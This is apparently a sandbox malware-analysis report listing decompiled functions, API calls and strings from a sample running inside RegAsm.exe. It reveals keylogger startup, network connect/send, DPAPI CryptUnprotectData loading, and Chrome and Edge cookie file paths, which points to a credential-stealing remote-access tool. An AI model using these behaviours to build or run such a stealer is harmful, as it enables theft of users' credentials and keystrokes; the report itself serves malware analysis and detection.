                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 004509E6
                                                          • _free.LIBCMT ref: 004509F8
                                                          • _free.LIBCMT ref: 00450A0A
                                                          • _free.LIBCMT ref: 00450A1C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                          Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 100091D0
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100091E2
                                                          • _free.LIBCMT ref: 100091F4
                                                          • _free.LIBCMT ref: 10009206
                                                          • _free.LIBCMT ref: 10009218
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                          Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00444066
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00444078
                                                          • _free.LIBCMT ref: 0044408B
                                                          • _free.LIBCMT ref: 0044409C
                                                          • _free.LIBCMT ref: 004440AD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                          • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                          • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                          Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 1000536F
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 10005381
                                                          • _free.LIBCMT ref: 10005394
                                                          • _free.LIBCMT ref: 100053A5
                                                          • _free.LIBCMT ref: 100053B6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                          Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 0044E738
                                                          • _free.LIBCMT ref: 0044E855
                                                            • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                                            • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                            • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                          • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                          • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                          • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                          Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00F780A0,00000010), ref: 004048E0
                                                            • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                          • String ID: XQG$NG$PG
                                                          • API String ID: 1634807452-3565412412
                                                          • Opcode ID: ac79876b8c032ef2f2c5b8a593317c1009f428034ef9e67eee246b9d8226e0d0
                                                          • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                          • Opcode Fuzzy Hash: ac79876b8c032ef2f2c5b8a593317c1009f428034ef9e67eee246b9d8226e0d0
                                                          • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                          Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: `#D$`#D
                                                          • API String ID: 885266447-2450397995
                                                          • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                          • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                          • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                          • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                          Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                          • _free.LIBCMT ref: 00443540
                                                          • _free.LIBCMT ref: 0044354A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          • API String ID: 2506810119-1068371695
                                                          • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                          • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                          • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                          • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                          Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                          • _free.LIBCMT ref: 10004CE8
                                                          • _free.LIBCMT ref: 10004CF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          • API String ID: 2506810119-1068371695
                                                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                          Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CC58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "$0NG
                                                          • API String ID: 368326130-3219657780
                                                          • Opcode ID: 44602993bd37dcb0b46df03d8f32aef03929348bb3827289624895e7cc1e30d3
                                                          • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                          • Opcode Fuzzy Hash: 44602993bd37dcb0b46df03d8f32aef03929348bb3827289624895e7cc1e30d3
                                                          • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                          Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 004162F5
                                                            • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                            • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                            • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                            • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen$CloseCreateValue
                                                          • String ID: !D@$okmode$PG
                                                          • API String ID: 3411444782-3370592832
                                                          • Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                          • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                          • Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                          • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                          Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                          Strings
                                                          • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                          • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                          • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                          • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                          Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                          Strings
                                                          • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                          • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                          • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                          • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                          Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                          • API String ID: 1497725170-1359877963
                                                          • Opcode ID: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
                                                          • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                          • Opcode Fuzzy Hash: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
                                                          • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                          Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                          • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                          • String ID: Online Keylogger Started
                                                          • API String ID: 112202259-1258561607
                                                          • Opcode ID: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                                                          • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                          • Opcode Fuzzy Hash: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                                                          • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                          Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CryptUnprotectData$crypt32
                                                          • API String ID: 2574300362-2380590389
                                                          • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                          • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                          • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                          • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                          Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                          • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                          • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                          • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                          Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
